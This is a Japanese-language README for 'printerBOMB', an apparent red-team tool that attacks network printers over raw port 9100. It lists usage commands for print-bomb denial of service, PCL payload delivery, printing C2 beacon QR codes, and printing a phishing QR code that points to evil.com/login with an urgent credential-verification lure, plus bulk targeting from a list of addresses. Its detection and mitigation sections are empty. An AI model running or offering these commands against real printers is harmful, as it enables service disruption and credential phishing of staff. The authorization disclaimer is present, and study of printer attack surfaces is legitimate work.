
プリンタのセキュリティテスト用エクスプロイトフレームワーク。rawポート9100を介して動作し、PCLペイロード配信、DoS爆撃、C2 QRコード、フィッシングQRコード、およびステルスな外部送信マーカーを備えています。
____ _ _ _____ _ _ ___
| _ \| | | | | __ \ | \ | | _|
| |_) | | __ | | __ | |__) | __ | \| | | _
| _ <| | / _| | |/ / | ___/ ' \| . ` | | (_)
| |_) | | \_| | < | | | (_) | |\ | |___ |
|____/|_| \__ |_|\_\|_| \___/|_| \_|_____|
_ _ | |
| | | | | |
| |_| | | |
\___/ |_|
______
|______|
| |
|______|
🖨️ printerBOMB - プリンタスプーリング攻撃フレームワーク
見過ごされがちな攻撃ベクトルを悪用: ネットワークプリンタ
開発者: Azhari Ramadhan 🔥
PrintHackは、セキュリティ専門家、レッドチーム、ペネトレーションテスター向けに設計された高度なプリンタ悪用ツールです。このツールは、生のプリンタスプーリングプロトコル(ポート9100)を利用して、セキュリティ評価、プリンタの脆弱性テスト、現実世界の攻撃シナリオのシミュレーションを実行します。
⚠️ 免責事項: このツールは正当なセキュリティテストおよび教育目的のみを意図しています。所有しているシステム、または明示的なテスト許可を得たシステムでのみ責任を持って使用してください。
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt
Pillow - 画像処理qrcode - QRコード生成requests - HTTPリクエストpip install Pillow qrcode requests
# プリンタの接続性をテスト
python3 printerhack.py -t 192.168.1.100 --check
# テストページを送信
python3 printerhack.py -t 192.168.1.100 --test
# カスタムメッセージを印刷
python3 printerhack.py -t 192.168.1.100 -m "Hello from Red Team!"
# URLから画像を印刷(ASCIIに変換)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png
# PCLペイロードを送信
python3 printerhack.py -t 192.168.1.100 --pcl
# プリントボム(DoS - 10MB)
python3 printerhack.py -t 192.168.1.100 --bomb 10
# C2コールバックQRコードを印刷
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"
# フィッシングQRコードを印刷
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "URGENT: Verify your credentials"
# ファイルから複数のプリンタに印刷
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Security Test Message"
物理アクセスシナリオで侵害されたプリンタに隠れメッセージや指示を印刷します。
セキュリティ通知を装った認証情報収集ページにリンクするQRコードを印刷します。
エンコードされたデータの隠れ外部送信チャネルとしてプリンタ出力を使用します。
プリンタベースのサービス拒否攻撃に対する組織の耐性をテストします。
ネットワーク全体のプリンタを列挙して識別します。
検出指標:
緩和戦略:
THIS TOOL IS PROVIDED "AS IS" FOR LEGITIMATE SECURITY TESTING ONLY.
THE AUTHOR IS NOT LIABLE FOR ANY MISUSE OF THIS TOOL.
ALWAYS obtain written authorization before testing any system.
Unauthorized use may violate Computer Fraud and Abuse Act (CFAA)
and similar laws in your jurisdiction.
Developed by: Azhari Ramadhan
貢献を歓迎します!以下の点を確認してください:
開発者: Azhari Ramadhan 🔥
MITライセンス - 詳細はLICENSEを参照
🖨️ printerBOMB - 最後の防衛線を悪用
攻撃者のように考えることで、攻撃者より先を行く
Azhari Ramadhanによって🔥で作られました
| 機能 | 説明 |
|---|
--check | プリンタの接続性をテスト |
--test | テストページを送信 |
--message | カスタムペイロードを印刷 |
--image | URLから画像を印刷(ASCIIアート) |
--pcl | PCL形式のペイロードを送信 |
--bomb | DoS攻撃(大規模ペイロード) |
--c2 | C2コールバックQRコードを印刷 |
--phish | フィッシングQRコードを印刷 |
--exfil | データ外部送信マーカーを印刷 |
--file | 複数のターゲットに一括印刷 |